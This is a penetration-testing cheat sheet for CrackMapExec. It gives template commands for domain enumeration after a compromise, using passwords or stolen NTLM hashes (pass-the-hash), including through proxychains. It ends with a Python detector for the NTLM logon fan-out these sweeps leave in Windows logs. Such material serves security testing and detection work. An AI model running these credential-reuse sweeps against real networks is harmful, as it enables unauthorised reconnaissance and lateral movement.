CrackMapExec
When to Use
Useful post-compromise: once you've dumped hashes from SAM or LSASS or obtained cleartext passwords, you can pass those credentials around the network to enumerate information such as:
Enumerate Users, Groups, and Computers
# Password authentication
crackmapexec smb CIDR/IP -d domain.tld -u username -p 'password' --users --groups --computers
# Via proxy host
proxychains -q crackmapexec smb CIDR/IP -d domain.tld -u username -p 'password' --users --groups --computers
# Pass the hash
crackmapexec smb CIDR/IP -d domain.tld -u username -H lm-hash:nt-hash --users --groups --computers
# Via proxy host
proxychains -q crackmapexec smb CIDR/IP -d domain.tld -u username -H lm-hash:nt-hash --users --groups --computers
Enumerate Everything
Note: some enumeration methods may fail depending on the privilege level of the user you're authenticating as. You can also add or remove parameters from the example command; for example, if you don't want to enumerate disks, remove the --disks option.
# Password authentication
crackmapexec smb CIDR/IP -d domain.tld -u username -p 'password' \
--shares \
--sessions \
--disks \
--loggedon-users \
--users \
--groups \
--computers \
--local-groups \
--pass-pol
# Pass the hash
crackmapexec smb CIDR/IP -d domain.tld -u username -H lm-hash:nt-hash \
--shares \
--sessions \
--disks \
--loggedon-users \
--users \
--groups \
--computers \
--local-groups \
--pass-pol
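From the defender's side, sweeps like the two commands above leave a recognisable footprint in Windows Security logs: one source address authenticating the same account over NTLM (Event ID 4624, logon type 3) to many hosts within a few minutes. The following is an added example, not part of the original page or the CrackMapExec project, that runs that fan-out check over a constructed batch of 4624-style records; the field names, thresholds and sample events are assumptions for illustration.

```python
"""Detect one (source IP, account) pair producing NTLM network logons to many
distinct hosts in a short window, the trace an authenticated SMB enumeration
sweep leaves in Windows Security logs (Event ID 4624, LogonType 3).
Added example; the sample events below are constructed, not real log data."""
from collections import defaultdict
from datetime import datetime, timedelta

_BASE = datetime(2024, 1, 10, 9, 0, 10)

# Constructed sample: a service account hitting six file servers over NTLM in
# under two minutes, plus Kerberos and low-volume NTLM noise that must not alert.
SAMPLE_EVENTS = [
    {"time": (_BASE + timedelta(seconds=15 * i)).isoformat(), "computer": f"FS0{i + 1}",
     "logon_type": 3, "auth_pkg": "NTLM", "user": "svc_backup", "src_ip": "10.0.5.23"}
    for i in range(6)
] + [
    # same account an hour later: outside any 5-minute window with the sweep
    {"time": "2024-01-10T10:12:00", "computer": "FS07", "logon_type": 3,
     "auth_pkg": "NTLM", "user": "svc_backup", "src_ip": "10.0.5.23"},
    # Kerberos logon: not NTLM, ignored
    {"time": "2024-01-10T09:00:30", "computer": "DC01", "logon_type": 3,
     "auth_pkg": "Kerberos", "user": "alice", "src_ip": "10.0.9.4"},
    # two NTLM network logons: below the host threshold
    {"time": "2024-01-10T09:01:00", "computer": "WS14", "logon_type": 3,
     "auth_pkg": "NTLM", "user": "bob", "src_ip": "10.0.9.8"},
    {"time": "2024-01-10T09:01:20", "computer": "WS15", "logon_type": 3,
     "auth_pkg": "NTLM", "user": "bob", "src_ip": "10.0.9.8"},
    # interactive logon (type 2): not a network logon, ignored
    {"time": "2024-01-10T09:02:00", "computer": "WS16", "logon_type": 2,
     "auth_pkg": "NTLM", "user": "bob", "src_ip": "10.0.9.8"},
]


def detect_fanout(events, window_seconds=300, min_hosts=5):
    """Group NTLM type-3 logons by (src_ip, user), slide a window over each
    group's timeline and report pairs that reached at least `min_hosts`
    distinct computers inside one window.

    Returns {(src_ip, user): sorted list of hosts seen in the densest window}.
    """
    window = timedelta(seconds=window_seconds)
    groups = defaultdict(list)
    for ev in events:
        if ev["logon_type"] == 3 and ev["auth_pkg"].upper() == "NTLM":
            groups[(ev["src_ip"], ev["user"])].append(
                (datetime.fromisoformat(ev["time"]), ev["computer"]))

    alerts = {}
    for key, logons in groups.items():
        logons.sort()  # chronological; tuples sort by timestamp first
        best = set()
        for i, (start, _) in enumerate(logons):
            # distinct hosts reached within `window` of this logon
            hosts = {host for t, host in logons[i:] if t - start <= window}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            alerts[key] = sorted(best)
    return alerts


if __name__ == "__main__":
    for (src_ip, user), hosts in detect_fanout(SAMPLE_EVENTS).items():
        print(f"ALERT {user}@{src_ip}: NTLM logons to {len(hosts)} hosts {hosts}")
```

The thresholds are deliberately parameters: a backup or monitoring account legitimately touches many hosts, so tune `min_hosts` and `window_seconds` per account class, and pair this with the account's normal source address rather than alerting on volume alone.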